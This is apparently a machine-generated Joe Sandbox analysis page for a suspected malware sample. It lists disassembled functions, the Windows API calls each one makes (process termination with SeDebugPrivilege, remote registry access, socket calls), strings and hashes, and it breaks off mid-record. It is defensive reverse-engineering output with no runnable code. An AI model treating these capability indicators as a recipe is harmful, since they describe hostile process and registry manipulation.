CreateThread.KERNEL32(00000000,00000000,00FE8992,00000000,00000000,00000000), ref: 00FE8986

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: f907407e026a4828e20c81e0e371839576cf1d0ac11d3ff01cb81b92f66753d9
Instruction ID: 35d6019cf8931cd33af8e5ee0fe6ec9c8434b46f3ac705318cdc729b70c66ca8
Opcode Fuzzy Hash: f907407e026a4828e20c81e0e371839576cf1d0ac11d3ff01cb81b92f66753d9
Instruction Fuzzy Hash: 6201CDB5640349BFE720AFA5DC4DF6B3BACEB89711F408411FA49DB195CAB99C04CB21

Function 01009B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 01009B7B
NULL Pointer assignment, xrefs: 01009BA4, 01009EC8

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 97324547cf848d41f0a984846518a03bca5c4b546904d3463a1060d130632fa9
Instruction ID: a2ab2808657255ebd37995496ede836653ebdd1d66280b98972cbb9693111a09
Opcode Fuzzy Hash: 97324547cf848d41f0a984846518a03bca5c4b546904d3463a1060d130632fa9
Instruction Fuzzy Hash: A4C1C471A0024A9FEF11DF99C884EAEB7F5FF48318F148469E949AB2C2E7709D45CB50

Function 01009113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01009167
VariantInit.OLEAUT32(?), ref: 01009238
VariantInit.OLEAUT32(?), ref: 01009339
VariantClear.OLEAUT32(?), ref: 01009343
VariantClear.OLEAUT32(?), ref: 010093A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0100931C
Null Object assignment in FOR..IN loop, xrefs: 010091C8, 010092F6, 010093AE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 2a2f891d0f809191f50e2f6e1e281658d85280fd881fb7085cf3e2fc5e4ee58f
Instruction ID: c099ea3b65f3d584a2180db3aaf52992452a9a26ae28162dfc8e020355b10c82
Opcode Fuzzy Hash: 2a2f891d0f809191f50e2f6e1e281658d85280fd881fb7085cf3e2fc5e4ee58f
Instruction Fuzzy Hash: 27918071A00209ABEF25DFA5CC48FAEBBB8EF45714F008559F559AB2C2D7749904CFA0

Function 0100975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00FE710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?,?,00FE7455), ref: 00FE7127
Part of subcall function 00FE710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE7142
Part of subcall function 00FE710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE7150
Part of subcall function 00FE710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?), ref: 00FE7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01009806
_memset.LIBCMT ref: 01009813
_memset.LIBCMT ref: 01009956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01009982
CoTaskMemFree.OLE32(?), ref: 0100998D

Strings

NULL Pointer assignment, xrefs: 010099DB

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 61ca4b6651e3311ac2abba26b85ccf55f16a6272d447135629a45051f7634faa
Instruction ID: d50fe49b6e3324d70a846fa1f2de499dbdc303eb1a274d251e129e9159944a64
Opcode Fuzzy Hash: 61ca4b6651e3311ac2abba26b85ccf55f16a6272d447135629a45051f7634faa
Instruction Fuzzy Hash: 20915871D00229EBEF11DFA5CC80EDEBBB9AF48714F10415AF519A7281DB359A44CFA0

Function 01016D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01016E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 01016E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01016E52
_wcscat.LIBCMT ref: 01016EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 01016EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 01016EF2

Strings

SysListView32, xrefs: 01016DF6

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 75ff2b9ae5f5ddb5057b935213862d8ac4f38289330b75b6f7b63aa20105dd61
Instruction ID: 5756eb636efcea2668ecf81c436be09629cd6dc1eca52f1516aba450419561f0
Opcode Fuzzy Hash: 75ff2b9ae5f5ddb5057b935213862d8ac4f38289330b75b6f7b63aa20105dd61
Instruction Fuzzy Hash: FB419371900349EBEB21DFA8CC85BEE77E8EF08354F10456AF584E7191D6BA99848B60

Function 0100E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00FF3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00FF3C7A
Part of subcall function 00FF3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00FF3C88
Part of subcall function 00FF3C55: CloseHandle.KERNEL32(00000000), ref: 00FF3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0100E9A4
GetLastError.KERNEL32 ref: 0100E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0100E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0100EA63
GetLastError.KERNEL32(00000000), ref: 0100EA6E
CloseHandle.KERNEL32(00000000), ref: 0100EAA3

Strings

SeDebugPrivilege, xrefs: 0100E9C2

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e011bc16592c836cf33c4158f5374363bce879e8de23f833eaa4c318b8af94f0
Instruction ID: ef5ddf3cbd17eeafee8c4c3e0f0ce56dc5ae6fd738f2a907d51bca5546e73a31
Opcode Fuzzy Hash: e011bc16592c836cf33c4158f5374363bce879e8de23f833eaa4c318b8af94f0
Instruction Fuzzy Hash: F941AE712042019FEB16EF18CC95F6DB7E5AF46314F08845CF9869B2C2DBB9A848DB91

Function 00FF2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00FF3033

Strings

warning, xrefs: 00FF301C
blank, xrefs: 00FF2FB5
stop, xrefs: 00FF3004
info, xrefs: 00FF2FD4
question, xrefs: 00FF2FEC

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 94ba52262acba7fe67e002c61a6634095f7043d9e502d317dbc3a039c0980627
Instruction ID: 11056c4606dd8723e5feb171da16502ef2861c18ba07515f1de63a8bae576e3e
Opcode Fuzzy Hash: 94ba52262acba7fe67e002c61a6634095f7043d9e502d317dbc3a039c0980627
Instruction Fuzzy Hash: CF112B3274838ABFE7149A56DC82DBB779C9F15734B20402BFB00A6181EF759F407AA0

Function 00FF42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FF4312
LoadStringW.USER32(00000000), ref: 00FF4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FF432F
LoadStringW.USER32(00000000), ref: 00FF4336
_wprintf.LIBCMT ref: 00FF435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FF437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00FF4357

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 273cdb50fc18a0803616099f66e336b52fd1684d5618d8d2cb53e78c28796361
Instruction ID: bd596955182e02619630194ee104f543981d65dce482e393a938caca843fbdb2
Opcode Fuzzy Hash: 273cdb50fc18a0803616099f66e336b52fd1684d5618d8d2cb53e78c28796361
Instruction Fuzzy Hash: 1B018FF2900209BFE721E6A0DD89EF7776CEB08300F000591BB89E2005EA395E884B70

Function 0101D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

GetSystemMetrics.USER32(0000000F), ref: 0101D47C
GetSystemMetrics.USER32(0000000F), ref: 0101D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0101D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0101D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0101D716
ShowWindow.USER32(00000003,00000000), ref: 0101D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0101D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0101D77D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: fdbdf9db48632923314304cce56b864c472161315845772d7642c7e03e0c7942
Instruction ID: 5c59fc2e31f9c424c90941e655d58d770fcf15af6480549b44bd648f8cc1239d
Opcode Fuzzy Hash: fdbdf9db48632923314304cce56b864c472161315845772d7642c7e03e0c7942
Instruction Fuzzy Hash: 62B18B71600215ABDF14CFACC9897AD7BF1BF08701F0481A9ED889F299E739A950CB50

Function 0100FD11 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 01010E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0100FDEE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: eec77fad1f3ea4281ad39756d7e4de719b986f185530365f8993e54b5e5dc97f
Instruction ID: 56024c15f186599a2a87067c45e74ea60ce2941957badd3f88e98def06720ebd
Opcode Fuzzy Hash: eec77fad1f3ea4281ad39756d7e4de719b986f185530365f8993e54b5e5dc97f
Instruction Fuzzy Hash: A3A180712043029FEB21EF18C885B6EBBE5BF85314F04841DF9958B292DB79E949DF42

Function 00F92A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FCC1C7,00000004,00000000,00000000,00000000), ref: 00F92ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FCC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00F92B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FCC1C7,00000004,00000000,00000000,00000000), ref: 00FCC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FCC1C7,00000004,00000000,00000000,00000000), ref: 00FCC286

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 73fb638d7267bff63ce67d1a6423deeb450393ece44def85d210a3383934a2d2
Instruction ID: d2e28138dfa921bcaaa75e9fceefe965b710008777a41aff434e60aea7492281
Opcode Fuzzy Hash: 73fb638d7267bff63ce67d1a6423deeb450393ece44def85d210a3383934a2d2
Instruction Fuzzy Hash: 1B411D33A08781BAEFB69B39CD8CB7B7B91BB95320F14880DE08786551C67DA845F750

Function 00FF70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00FF70DD

Part of subcall function 00FB0DB6: std::exception::exception.LIBCMT ref: 00FB0DEC
Part of subcall function 00FB0DB6: __CxxThrowException@8.LIBCMT ref: 00FB0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FF7114
EnterCriticalSection.KERNEL32(?), ref: 00FF7130
_memmove.LIBCMT ref: 00FF717E
_memmove.LIBCMT ref: 00FF719B
LeaveCriticalSection.KERNEL32(?), ref: 00FF71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FF71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF71DE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: dea0babf5ab9c57f802d8f8c4ea63a7a17eb6b64e49650b54241ae111c88351a
Instruction ID: e00ccbf0142e8e3a9415e611391bbd8002879e9db31d5048c73617a951b7457c
Opcode Fuzzy Hash: dea0babf5ab9c57f802d8f8c4ea63a7a17eb6b64e49650b54241ae111c88351a
Instruction Fuzzy Hash: 1A319E75A00206EBCB10EFA5DC85AAFB778EF45310F1441A5ED04AB246DB38DE14DBA0

Function 010161D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 010161EB
GetDC.USER32(00000000), ref: 010161F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 010161FE
ReleaseDC.USER32(00000000,00000000), ref: 0101620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01016246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01016257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0101902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01016291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010162B1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: eb9751c2f4253fbbfad0d709f3b0e580727cad5e0ba4a1d9ce4816b0780bf327
Instruction ID: a8c9333400050936b92ca299d5e1ba9b93b6bc77fd80475157dd427bde463178
Opcode Fuzzy Hash: eb9751c2f4253fbbfad0d709f3b0e580727cad5e0ba4a1d9ce4816b0780bf327
Instruction Fuzzy Hash: FA319F721006107FEF218F64CC8AFEA3FA9EF4A765F040055FE889A185C6BA9845CB60

Function 00FEBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00FEBBC4
_memcmp.LIBCMT ref: 00FEBBE6
_memcmp.LIBCMT ref: 00FEBBFE
_memcmp.LIBCMT ref: 00FEBC11
_memcmp.LIBCMT ref: 00FEBC2B
_memcmp.LIBCMT ref: 00FEBC3E
_memcmp.LIBCMT ref: 00FEBC56
_memcmp.LIBCMT ref: 00FEBC71

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d13c9616e8cd81f9ad7c00a3ca51960dace292df2784d1f3da8dcf75ace5f46a
Instruction ID: 2437a8281e21898e86f94a3130399be4cc56ce47be441895cb87ef9ba08b3a0d
Opcode Fuzzy Hash: d13c9616e8cd81f9ad7c00a3ca51960dace292df2784d1f3da8dcf75ace5f46a
Instruction Fuzzy Hash: A1215772B0425ABBE208B617DD52FFB735CAE51358F584424FD049B603EB28DE10F6A1

Function 00FFEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

Part of subcall function 00FAFC86: _wcscpy.LIBCMT ref: 00FAFCA9

_wcstok.LIBCMT ref: 00FFEC94
_wcscpy.LIBCMT ref: 00FFED23
_memset.LIBCMT ref: 00FFED56

Strings

X, xrefs: 00FFED93

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 93eea7fc07606b0617c18d50b03bc4ba5a80a5187d929a7f53fa74020f73d69b
Instruction ID: 22afac95ee921ae4ec2404caa8198fbbd68cfb2d9c86f7caeb8053e1f9ab6664
Opcode Fuzzy Hash: 93eea7fc07606b0617c18d50b03bc4ba5a80a5187d929a7f53fa74020f73d69b
Instruction Fuzzy Hash: 04C1A0716083459FDB54EF24C881A6AB7E4FF85320F00492DF9999B2B2DB74ED05EB42

Function 01006B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01006C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01006C21
WSAGetLastError.WSOCK32(00000000), ref: 01006C34
htons.WSOCK32(?,?,?,00000000,?), ref: 01006CEA
inet_ntoa.WSOCK32(?), ref: 01006CA7

Part of subcall function 00FEA7E9: _strlen.LIBCMT ref: 00FEA7F3
Part of subcall function 00FEA7E9: _memmove.LIBCMT ref: 00FEA815

_strlen.LIBCMT ref: 01006D44
_memmove.LIBCMT ref: 01006DAD

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 8eae838165388b278e9b8b26d64539548f3be0fba50b5149df617db246d32d2b
Instruction ID: dfed5f51ed2b166f3748f5bffada585db58e32c641a5d76a4d5d6b78d80b38ba
